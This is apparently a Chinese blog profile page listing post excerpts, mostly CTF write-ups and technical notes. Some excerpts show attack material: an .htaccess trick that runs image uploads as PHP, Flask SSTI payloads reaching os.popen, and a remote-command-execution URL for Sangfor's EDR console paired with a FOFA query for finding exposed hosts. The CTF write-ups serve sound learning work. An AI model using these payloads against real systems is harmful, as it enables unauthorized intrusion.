3 尸者狗

尚未进行身份认证

我要认证

夫民别而听之则愚,合而听之则圣 不接受未授权测试咨询

等级
TA的排名 3w+

互联网圈常用缩写DAU、MAU、PCU、pv、uv(运营方向)

互联网常用的词总结,主要是运营方面的DAU: daily active user,日活跃用户数量MAU: monthly active users,月活跃用户量PCU:Peak concurrent users ,最高同时在线玩家人数pv:pageview,即页面浏览量,或点击量;通常是衡量一个网络新闻频道或网站甚至一条网络新闻的主要指标;uv:(unique visitor),指访问某个站点或点击某条新闻的不同IP地址的人数。在同一天内,uv只记录第一次进入网站的具有独立IP的访问者,在同一.

2020-10-11 18:30:40

数据结构知识点思维导图(绪论)

数据结构思维导图,文章内容为xmind导出的markdown文件,理论上可以自行转成导图因为使用ocr识别,所以造成部分内容有错误,但是不影响知识点理解绪论数据结构的基本概念基本概念和术语数据数据是信息的载体,是描述客观事物属性的数、字符及所有能输入到计算机中并被计算机程序识别和处理的符号的集合数据元素数据元素是数据的基本单位,通常作为一个整体进行考虑和处理数据对象数据对象是具有相同性质的数庭元素的集合,是数庭的一个子集数据类型数据类型是一个值的集

2020-10-02 10:39:49

[MRCTF2020]你传你呢

准备一张图片马,命名shell.png.htaccess文件<FilesMatch "s">SetHandler application/x-httpd-php</FilesMatch>需要用burp修改Content-Type: image/jpeg

2020-09-06 21:48:48

GYCTF2020 FlaskApp

GYCTF2020 FlaskApp,老规矩,还是buu的平台知识点flask的SSTIssti的绕过(拼接字符串,倒序切片,内置对象、函数)pin码的生成信息收集因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的直接报错抛出debug信息,看来是开启了debug模式参见该文章:Flask开启debug模式等于给黑客留了后门而且读到了app.py的部分代码大致的

2020-09-04 13:55:35

手把手教你搭建动态独立靶机的ctfd靶场

因为是准备给学校搭的靶场,所以用的是阿里云的学生机配置信息CPU: 1核内存: 2 GiB带宽: 1Mbps操作系统: CentOS 7.4 64位配置各类基础环境升级系统包&安装各类基础依赖包yum updateyum install -y git nginx mariadb mariadb-server Mysql-python python-pip gcc python-devel yum-utils device-mapper-persistent-data lvm2

2020-09-03 15:10:20

GACTF2020 simpleflask& EZFLASK

信息收集直接访问,提示方法不允许使用burpsuite,右键-change request method提示了个name,猜测是参数因为题目是flask,容易想到ssti,直接试name={{2*2}}再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果可以确定是存在ssti的,接下来就是具体的bypass和get flag了bypass&利用用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list[](\

2020-09-03 14:28:15

GACTF crymisc writeup

题目描述8.25 is Chinese Valentine’s Day.Yesterday my brother told me he was refused by a beautiful girl.He was sooooooooooooo sad and bursted into tears.链接:https://pan.baidu.com/s/1EZzhnAa5Q4OD8y-YEAcjzQ提取码:866hhttps://drive.google.com/drive/folders/1gDfMB

2020-09-02 09:24:14

Kali配置Node.js&npm

避免在线工具崩(跑路),本地搭一搭,多数关于node.js本文就是Kali配置Node.js&npm注意上网方式,这几个包非常慢sudo apt-get install nodejssudo apt-get install npm验证npm安装成功node --version

2020-09-01 23:29:10

GACTF trihistory writeup

知识点docker各种命令使用&git使用、回滚&vim的.swp文件题目描述triple historydocker pull impakho/trihistory:latestWrite up预备知识在开始正式解题前,最好能知道docker各种命令使用&git使用信息收集&正式解题首先拉取镜像docker pull impakho/trihistory:latestdocker run impakho/trihistory:latestdocke

2020-09-01 20:23:59

GACTF oldmodem writeup

题目描述old modem (bell 202)China:https://pan.baidu.com/s/184Trg9M94uVSekGycaAR_w (密码:5mp2)Overseas:https://drive.google.com/drive/folders/1T94OrcveHAZTmTCwaVCojLXYlJc3lL3f?usp=sharingWriteup首先,modem是调制解调器(猫)的意思,Google发现bell 202是一种标准,完成这些信息收集后,正式开始下载文件

2020-09-01 06:32:36

RootersCTF2019 I ♥ Flask

知识点url参数爆破、ssti信息收集看了别人的wp,才知道http参数这方面的信息收集这里使用arjun,当然也可以万能的burpsuitepython3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get得到参数name改成/?name={{3*3}}利用和get flag获取当前目录下文件列表xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').

2020-08-29 15:47:50

Arjun:一款http参数扫描器的使用

Arjun:一款http参数扫描器,主要就是爆破url参数的项目地址Arjun特点多线程检测彻底自动速率限制处理典型的扫描需要30秒GET/POST/JSON 方法支持25,980个参数名称的大列表下载安装git clone https://github.com/s0md3v/Arjun.git使用我等小白只需要最简单用法即可,其他内容到时候看wiki就行python3 arjun.py -u https://api.example.com/endpoint --get

2020-08-29 15:10:13

[CSCCTF 2019 Qual] FlaskLight

信息收集index大致就这样,没什么信息F12看下,发现了线索:search参数试下ssti基本就是ssti了漏洞利用config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。{{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}}爆出一堆信息,这里获得第二个线索,flag在这个目录You searched for:[('JSON_

2020-08-29 13:37:28

linux常见压缩格式的压缩和解压(.tar&.gz&.tar.gz&.tar.xz)

.tar格式解包:tar xvf FileName.tar打包:tar cvf FileName.tar DirName(注:tar是打包,不是压缩!).gz格式解压1:gunzip FileName.gz解压2:gzip -d FileName.gz压 缩: gzip FileName.tar.gz格式解压:tar zxvf FileName.tar.gz压缩:tar zcvf FileName.tar.gz DirName.tar.xz格式解压xz -d node-v6.6.0-

2020-08-29 10:43:01

攻防世界 web Web_php_unserialize

攻防世界 web 高手区 Web_php_unserialize资源&工具PHP 手册W3School的PHP 参考手册write up源码<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { e

2020-08-24 18:40:43

深信服 EDR终端检测响应平台RCE漏洞

payloadhttps://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rcefofa语法title="终端检测响应平台"处理方式只能暂时下线,貌似问题还比较多,很多要重写资产基本是国内的,别乱打了,,,...

2020-08-18 17:04:25

Windows10沙盒与VMware不兼容问题

Windows10沙盒与VMware不兼容问题前几天试了一下win的沙盒模式,感觉有虚拟机的情况下比较鸡肋,就没再管,今天在开启VMware虚拟机时遇到一个问题报错信息:VMware Workstation和Device / Credential Guard不兼容。禁用Device / Credential Guard后,可以运行VMware Workstation解决方案:win键+x选择powershell(管理员)粘贴命令bcdedit /set hypervisorlauncht

2020-08-16 17:16:38

计算机网络各层网络设备(中继器、集线器、网桥、交换机、路由器、网关)总结

计算机网络中,有几个通信设备或者说网络设备名词出现的频率相当的高,它们是:中继器、集线器、网桥、交换机、路由器和网关。现在梳理一下它们各自的含义和作用,以及它们之间的联系。这些网络设备对于实际工作中并不全面,比如现在已经出现了三层交换机、四层交换机,但是理念是基本共通的。

2020-08-07 20:24:48

Rust实例学习(猜数字游戏)

使用Rust实现一个经典的新手编程问题:猜数字游戏。本节涉及Rust中的let、match、方法、关联函数、外部 crate 等知识程序运行逻辑:程序将会随机生成一个 1 到 100 之间的随机整数。接着它会请玩家猜一个数并输入,然后提示猜测是大了还是小了。如果猜对了,它会打印祝贺信息并退出

2020-08-03 21:34:28

修改Markdown表格对齐方式、markdown表格内单元格换行

记录几个最近经常遇到的问题首先是修改Markdown表格对齐方式,其实就是修改第二行的:的位置默认居中居左居右居中xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|默认居中|居左|居右|居中||- |:---|---:|:---:||x

2020-08-03 04:51:52

查看更多

勋章 我的勋章
  • 签到新秀
    签到新秀
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 原力探索 · S
    原力探索 · S
    在《原力计划【第二季】》打卡挑战活动中,发布 12 篇原创文章参与活动的博主,即可获得此勋章。(本次活动结束后统一统计发放)